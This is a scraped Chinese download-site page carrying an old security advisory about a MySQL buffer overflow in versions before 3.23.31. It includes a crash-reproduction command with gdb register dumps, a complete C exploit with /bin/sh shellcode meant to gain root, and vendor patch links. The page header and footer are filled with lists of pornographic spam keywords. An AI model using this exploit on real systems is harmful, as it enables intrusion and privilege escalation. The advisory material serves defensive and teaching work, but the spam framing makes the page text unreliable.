亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來(lái)到蟲(chóng)蟲(chóng)下載站! | ?? 資源下載 ?? 資源專(zhuān)輯 ?? 關(guān)于我們
? 蟲(chóng)蟲(chóng)下載站

?? mysql實(shí)例-4.htm

?? mysql_iso系列多媒體教學(xué)
?? HTM
字號(hào):
<body bgcolor="#000000"><p><font color="#009900"><B>mysql遠(yuǎn)程緩沖區(qū)溢出漏洞</B></font></p>
<p><font color="#FFFFFF">受影響的系統(tǒng): <BR>
  T.C.X DataKonsult MySQL 3.23.30 <BR>
  T.C.X DataKonsult MySQL 3.23.29 <BR>
  T.C.X DataKonsult MySQL 3.23.28 <BR>
  T.C.X DataKonsult MySQL 3.23.27 <BR>
  T.C.X DataKonsult MySQL 3.23.26 <BR>
  T.C.X DataKonsult MySQL 3.23.25 <BR>
  T.C.X DataKonsult MySQL 3.23.24 <BR>
  T.C.X DataKonsult MySQL 3.23.23 <BR>
  不受影響系統(tǒng): <BR>
  T.C.X DataKonsult MySQL 3.23.31 <BR>
  描述: <BR>
  -------------------------------------------------------------------------------- 
  <BR>
  <BR>
  <BR>
  BUGTRAQ ID :2262 <BR>
  <BR>
  MySQL是一個(gè)開(kāi)放源代碼的自由數(shù)據(jù)庫(kù)軟件。3.23.31以前的版本都存在一個(gè)緩沖區(qū) <BR>
  溢出漏洞。 <BR>
  <BR>
  通過(guò)使用一個(gè)特別長(zhǎng)的字符串作為SELECT語(yǔ)句的參數(shù),可能導(dǎo)致mysqld發(fā)生緩沖區(qū) <BR>
  溢出。堆棧中的數(shù)據(jù)可能被覆蓋或修改,攻擊者可能遠(yuǎn)程獲取mysqld的運(yùn)行權(quán)限或 <BR>
  使mysqld數(shù)據(jù)庫(kù)崩潰。 <BR>
  <BR>
  &lt;*來(lái)源:Joao Gouveia (tharbad@kaotik.org) *&gt; <BR>
  <BR>
  <BR>
  測(cè)試程序: <BR>
  -------------------------------------------------------------------------------- 
  <BR>
  <BR>
  警 告 <BR>
  <BR>
  以下程序(方法)可能帶有攻擊性,僅供安全研究與教學(xué)之用。使用者風(fēng)險(xiǎn)自負(fù)! <BR>
  <BR>
  <BR>
  <BR>
  Joao Gouveia提供了下列測(cè)試步驟: <BR>
  <BR>
  &gt; On one terminal: <BR>
  &gt; &lt;quote&gt; <BR>
  &gt; spike:/var/mysql # /sbin/init.d/mysql start <BR>
  &gt; Starting service MySQL. <BR>
  &gt; Starting mysqld daemon with databases from /var/mysql <BR>
  &gt; done <BR>
  &gt; spike:/var/mysql # <BR>
  &gt;&lt;/quote&gt; <BR>
  &gt; <BR>
  &gt; On the other terminal: <BR>
  &gt; &lt;quote&gt; <BR>
  &gt; jroberto@spike:~ &gt; mysql -p -e 'select a.'`perl -e'printf("A"x130)'`'.b' 
  <BR>
  &gt; Enter password: <BR>
  &gt; (hanged..^C) <BR>
  &gt; &lt;/quote&gt; <BR>
  &gt; <BR>
  &gt; On the first terminal i got: <BR>
  &gt; &lt;quote&gt; <BR>
  &gt; spike:/var/mysql # /usr/bin/safe_mysqld: line 149: 15557 Segmentation fault 
  <BR>
  &gt; nohup <BR>
  &gt; $ledir/mysqld --basedir=$MY_BASEDIR_VERSION --datadir=$DATADIR --skip-lockin 
  <BR>
  &gt; g "$@" &gt;&gt;$err_log 2&gt;&amp;1&gt; <BR>
  &gt; Number of processes running now: 0 <BR>
  &gt; mysqld restarted on Fri Jan 12 07:10:54 WET 2001 <BR>
  &gt; mysqld daemon ended <BR>
  &gt; &lt;/quote&gt; <BR>
  &gt; <BR>
  &gt; gdb shows the following: <BR>
  &gt; &lt;quote&gt; <BR>
  &gt; (gdb) run <BR>
  &gt; Starting program: /usr/sbin/mysqld <BR>
  &gt; [New Thread 16897 (manager thread)] <BR>
  &gt; [New Thread 16891 (initial thread)] <BR>
  &gt; [New Thread 16898] <BR>
  &gt; /usr/sbin/mysqld: ready for connections <BR>
  &gt; [New Thread 16916] <BR>
  &gt; [Switching to Thread 16916] <BR>
  &gt; <BR>
  &gt; Program received signal SIGSEGV, Segmentation fault. <BR>
  &gt; 0x41414141 in ?? () <BR>
  &gt; (gdb) info all-registers <BR>
  &gt; eax 0x1 1 <BR>
  &gt; ecx 0x68 104 <BR>
  &gt; edx 0x8166947 135686471 <BR>
  &gt; ebx 0x41414141 1094795585 <BR>
  &gt; esp 0xbf5ff408 0xbf5ff408 <BR>
  &gt; ebp 0x41414141 0x41414141 <BR>
  &gt; esi 0x41414141 1094795585 <BR>
  &gt; edi 0x0 0 <BR>
  &gt; eip 0x41414141 0x41414141 <BR>
  &gt; eflags 0x10246 66118 <BR>
  &gt; cs 0x23 35 <BR>
  &gt; ss 0x2b 43 <BR>
  &gt; ds 0x2b 43 <BR>
  &gt; es 0x2b 43 <BR>
  &gt; fs 0x0 0 <BR>
  &gt; gs 0x0 0 <BR>
  &gt; (gdb) <BR>
  &gt; &lt;/quote&gt; <BR>
  <BR>
  Luis Miguel Silva [aka wC](lms@ispgaya.pt)提供了一個(gè)測(cè)試程序: <BR>
  <BR>
  #include &lt;stdio.h&gt; <BR>
  <BR>
  #define DEFAULT_OFFSET 0 <BR>
  #define DEFAULT_BUFFER_SIZE 130 <BR>
  #define NOP 0x90 <BR>
  <BR>
  // Our EVIL code... <BR>
  char shellcode[] = <BR>
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" <BR>
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" <BR>
  "\x80\xe8\xdc\xff\xff\xff/bin/sh"; <BR>
  <BR>
  unsigned <BR>
  long get_sp(void) { <BR>
  __asm__("movl %esp,%eax"); <BR>
  } <BR>
  <BR>
  // Where it all happens... <BR>
  main(int argc, char *argv[]) <BR>
  { <BR>
  char *buffer, *ptr, tmp[1500]; <BR>
  long *addr_ptr, addr; <BR>
  int i,bsize=DEFAULT_BUFFER_SIZE,offset=DEFAULT_OFFSET; <BR>
  <BR>
  printf("\nMySQL [al versions &lt; 3.23.31] Local Exploit by <BR>
  lms@ispgaya.pt\n\n"); <BR>
  if (argc==2) offset=atoi(argv[1]); <BR>
  else <BR>
  printf("Happy toughts: Did you know you can pass a offset as argv[1]? :]\n"); 
  <BR>
  <BR>
  printf("Trying to allocate memory for buffer (%d bytes)...",bsize); <BR>
  if (!(buffer = malloc(bsize))) { <BR>
  printf("ERROR!\n"); <BR>
  printf("Couldn't allocate memory...\n"); <BR>
  printf("Exiting...\n"); <BR>
  exit(0); <BR>
  } <BR>
  printf("SUCCESS!\n"); <BR>
  addr=get_sp()-offset; <BR>
  printf("Using address : 0x%x\n", addr); <BR>
  printf("Offset : %d\n",offset); <BR>
  printf("Buffer Size : %d\n",bsize); <BR>
  ptr=buffer; <BR>
  addr_ptr=(long *) ptr; <BR>
  for (i=0;i&lt;bsize;i+=4) *(addr_ptr++)=addr; <BR>
  for (i=0;i&lt;bsize/2;i++) buffer[i]=NOP; <BR>
  ptr=buffer+((bsize/2)-(strlen(shellcode)/2)); <BR>
  for (i=0;i&lt;strlen(shellcode);i++) *(ptr++)=shellcode[i]; <BR>
  buffer[bsize-1]='\0'; <BR>
  snprintf(tmp,sizeof(tmp),"mysql -p -e 'select a.'%s'.b'",buffer); <BR>
  printf("Oh k...i have the evil'buffer right here :P\n"); <BR>
  printf("So...[if all went well], prepare to be r00t...\n"); <BR>
  system(tmp); <BR>
  } <BR>
  <BR>
  <BR>
  -------------------------------------------------------------------------------- 
  <BR>
  建議: <BR>
  <BR>
  廠商補(bǔ)丁: <BR>
  <BR>
  NSFOCUS建議您立即升級(jí)到MySQL 3.23.31以上版本,它已經(jīng)解決了這一問(wèn)題。 <BR>
  廠商地址:http://www.mysql.com/ <BR>
  <BR>
  很多Linux廠商也提供了升級(jí)軟件包: <BR>
  <BR>
  【redhat】 <BR>
  <BR>
  Red Hat Linux 7.0: <BR>
  <BR>
  SRPMS: <BR>
  http://updates.redhat.com/7.0/SRPMS/mysql-3.23.32-1.7.src.rpm <BR>
  http://updates.redhat.com/7.0/SRPMS/mysqlclient9-3.23.22-3.src.rpm <BR>
  <BR>
  alpha: <BR>
  http://updates.redhat.com/7.0/alpha/mysql-3.23.32-1.7.alpha.rpm <BR>
  http://updates.redhat.com/7.0/alpha/mysql-devel-3.23.32-1.7.alpha.rpm <BR>
  http://updates.redhat.com/7.0/alpha/mysql-server-3.23.32-1.7.alpha.rpm <BR>
  http://updates.redhat.com/7.0/alpha/mysqlclient9-3.23.22-3.alpha.rpm <BR>
  <BR>
  i386: <BR>
  http://updates.redhat.com/7.0/i386/mysql-3.23.32-1.7.i386.rpm <BR>
  http://updates.redhat.com/7.0/i386/mysql-devel-3.23.32-1.7.i386.rpm <BR>
  http://updates.redhat.com/7.0/i386/mysql-server-3.23.32-1.7.i386.rpm <BR>
  http://updates.redhat.com/7.0/i386/mysqlclient9-3.23.22-3.i386.rpm <BR>
  <BR>
  【debian】 <BR>
  <BR>
  Debian GNU/Linux 2.2 alias potato <BR>
  - ------------------------------------ <BR>
  <BR>
  Source archives: <BR>
  <BR>
  http://security.debian.org/dists/stable/updates/main/source/mysql_3.22.32-4.diff.gz 
  <BR>
  http://security.debian.org/dists/stable/updates/main/source/mysql_3.22.32-4.dsc 
  <BR>
  http://security.debian.org/dists/stable/updates/main/source/mysql_3.22.32.orig.tar.gz 
  <BR>
  <BR>
  Architecture independent: <BR>
  <BR>
  http://security.debian.org/dists/stable/updates/main/binary-all/mysql-doc_3.22.32-4_all.deb 
  <BR>
  <BR>
  Intel ia32 architecture: <BR>
  <BR>
  http://security.debian.org/dists/stable/updates/main/binary-i386/mysql-client_3.22.32-4_i386.deb 
  <BR>
  http://security.debian.org/dists/stable/updates/main/binary-i386/mysql-server_3.22.32-4_i386.deb 
  <BR>
  <BR>
  Motorola 680x0 architecture: <BR>
  <BR>
  http://security.debian.org/dists/stable/updates/main/binary-m68k/mysql-client_3.22.32-4_m68k.deb 
  <BR>
  http://security.debian.org/dists/stable/updates/main/binary-m68k/mysql-server_3.22.32-4_m68k.deb 
  <BR>
  <BR>
  Sun Sparc architecture: <BR>
  <BR>
  http://security.debian.org/dists/stable/updates/main/binary-sparc/mysql-client_3.22.32-4_sparc.deb 
  <BR>
  http://security.debian.org/dists/stable/updates/main/binary-sparc/mysql-server_3.22.32-4_sparc.deb 
  <BR>
  <BR>
  Alpha architecture: <BR>
  <BR>
  http://security.debian.org/dists/stable/updates/main/binary-alpha/mysql-client_3.22.32-4_alpha.deb 
  <BR>
  http://security.debian.org/dists/stable/updates/main/binary-alpha/mysql-server_3.22.32-4_alpha.deb 
  <BR>
  <BR>
  PowerPC architecture: <BR>
  <BR>
  http://security.debian.org/dists/stable/updates/main/binary-powerpc/php4-mysql_4.0.3pl1-0potato1_powerpc.deb 
  <BR>
  http://security.debian.org/dists/stable/updates/main/binary-powerpc/mysql-server_3.22.32-4_powerpc.deb 
  <BR>
  <BR>
  ARM architecture: <BR>
  <BR>
  http://security.debian.org/dists/stable/updates/main/binary-arm/mysql-server_3.22.32-4_arm.deb 
  <BR>
  http://security.debian.org/dists/stable/updates/main/binary-all/mysql-doc_3.22.32-4_all.deb 
  <BR>
  <BR>
  </font></p>

?? 快捷鍵說(shuō)明

復(fù)制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號(hào) Ctrl + =
減小字號(hào) Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
久久婷婷色综合| 欧美吞精做爰啪啪高潮| 欧美精品自拍偷拍动漫精品| 国产午夜亚洲精品午夜鲁丝片| 亚洲欧美激情在线| 国产福利不卡视频| 欧美一区二区在线免费观看| 亚洲欧美偷拍卡通变态| 国产精品91一区二区| 91精品国产综合久久久久久| 亚洲精品国产品国语在线app| 国产另类ts人妖一区二区| 欧美一卡在线观看| 亚洲一区二区四区蜜桃| 99久久久久久| 欧美激情一区在线| 激情小说亚洲一区| 欧美一二三区在线| 亚洲福利视频一区| 91福利国产精品| 亚洲人123区| 成人av片在线观看| 国产欧美综合色| 国产一区激情在线| 精品久久久三级丝袜| 美国十次了思思久久精品导航| 欧美日本在线视频| 亚洲高清在线视频| 欧美色视频一区| 亚洲一区在线观看视频| 91免费精品国自产拍在线不卡| 国产欧美日韩视频一区二区| 国产精品小仙女| 久久精品男人天堂av| 久久99久久精品| 欧美va在线播放| 九九视频精品免费| 精品国产不卡一区二区三区| 久久se精品一区精品二区| 日韩美女一区二区三区| 麻豆传媒一区二区三区| 欧美岛国在线观看| 经典三级一区二区| 国产清纯白嫩初高生在线观看91 | 亚洲综合小说图片| 日本韩国精品在线| 亚洲国产日韩av| 欧美另类z0zxhd电影| 日韩中文字幕一区二区三区| 91精品国产高清一区二区三区 | av一区二区三区| 国产精品国模大尺度视频| 不卡视频在线看| 一区二区欧美视频| 欧美日韩国产美| 日本欧美一区二区三区| 一区二区成人在线观看| 在线观看视频一区| 丝袜a∨在线一区二区三区不卡| 91精品国产综合久久久久| 久久国产免费看| 国产欧美综合在线| 91黄色小视频| 日韩经典一区二区| 久久女同精品一区二区| 国产高清精品久久久久| 亚洲三级小视频| 欧美日韩成人综合在线一区二区| 免费成人小视频| 中文字幕av资源一区| 91精品福利视频| 久久99热这里只有精品| 中日韩av电影| 欧美性大战久久| 精品中文字幕一区二区小辣椒| 久久精品网站免费观看| 色视频欧美一区二区三区| 日韩精品一二区| 欧美精彩视频一区二区三区| 色婷婷国产精品| 久久精工是国产品牌吗| 中文字幕av不卡| 欧美日本一区二区在线观看| 国产一区二区三区观看| 艳妇臀荡乳欲伦亚洲一区| 91精品国产综合久久国产大片| 国产99久久久国产精品潘金| 一区二区三区**美女毛片| 日韩精品影音先锋| 色综合天天做天天爱| 免费观看30秒视频久久| 国产精品久久毛片a| 7777精品伊人久久久大香线蕉| 国产精品亚洲视频| 性做久久久久久免费观看欧美| 精品成人一区二区| 91麻豆成人久久精品二区三区| 蜜臀av一级做a爰片久久| 亚洲天堂2014| 欧美精品一区男女天堂| 在线视频一区二区三| 国内精品国产成人国产三级粉色| 日韩美女视频一区| 26uuu精品一区二区| 欧美日韩亚洲综合在线 | 风间由美一区二区三区在线观看 | 91丨九色丨国产丨porny| 日av在线不卡| 一区二区三区在线高清| 久久久av毛片精品| 91精品福利在线一区二区三区| a在线欧美一区| 精品一区二区在线免费观看| 亚洲国产日韩综合久久精品| 国产精品欧美一区喷水| 欧美xxxx在线观看| 精品视频1区2区| 97精品视频在线观看自产线路二| 国产在线播放一区| 日韩二区三区四区| 一区二区三区免费观看| 欧美国产精品中文字幕| 精品久久久久一区| 欧美一区二区播放| 欧美日韩黄视频| 91视频一区二区| 国产69精品久久777的优势| 美女国产一区二区| 亚洲国产精品久久一线不卡| 日本午夜精品视频在线观看| 一区二区视频在线| 国产精品美女久久久久aⅴ| 日韩精品一区二区三区中文精品| 欧美精品久久99久久在免费线| 97久久精品人人做人人爽| 成人国产精品免费网站| 国产不卡一区视频| 国产激情91久久精品导航| 久久精品国产亚洲a| 午夜私人影院久久久久| 亚洲精品视频在线观看网站| 中文字幕色av一区二区三区| 欧美高清在线一区| 国产亚洲欧美日韩在线一区| 久久综合久久综合久久综合| 日韩欧美区一区二| 日韩写真欧美这视频| 日韩色在线观看| 欧美一区二区三区喷汁尤物| 在线观看91av| 欧美精品免费视频| 欧美肥胖老妇做爰| 制服丝袜在线91| 日韩一区二区在线看| 日韩免费成人网| 日韩三级伦理片妻子的秘密按摩| 欧美一级艳片视频免费观看| 欧美一级在线观看| 精品美女在线播放| 精品国产区一区| 久久精子c满五个校花| 中文字幕欧美激情一区| 国产精品沙发午睡系列990531| 国产精品久久看| 日韩一区日韩二区| 伊人一区二区三区| 亚洲18色成人| 玖玖九九国产精品| 国产精品影视天天线| 大胆亚洲人体视频| 91在线国内视频| 欧美亚洲综合色| 欧美精品一卡二卡| 欧美变态tickling挠脚心| 欧美精品一区二区久久婷婷| 国产亚洲精品超碰| 国产精品卡一卡二卡三| 亚洲婷婷国产精品电影人久久| 亚洲制服欧美中文字幕中文字幕| 亚洲国产sm捆绑调教视频| 免费人成网站在线观看欧美高清| 精品亚洲国产成人av制服丝袜| 国产成人综合在线播放| 97超碰欧美中文字幕| 欧美日韩国产另类一区| 日韩一区二区三区av| 亚洲一区日韩精品中文字幕| 亚洲aⅴ怡春院| 免费人成黄页网站在线一区二区| 欧美bbbbb| 国产91丝袜在线播放九色| 91在线国产福利| 91在线观看免费视频| 91精品国产综合久久香蕉的特点| 久久精品视频在线免费观看| 26uuu欧美日本| 亚洲男同性视频| 久久精品免费看| av中文字幕亚洲| 欧美一级二级三级蜜桃|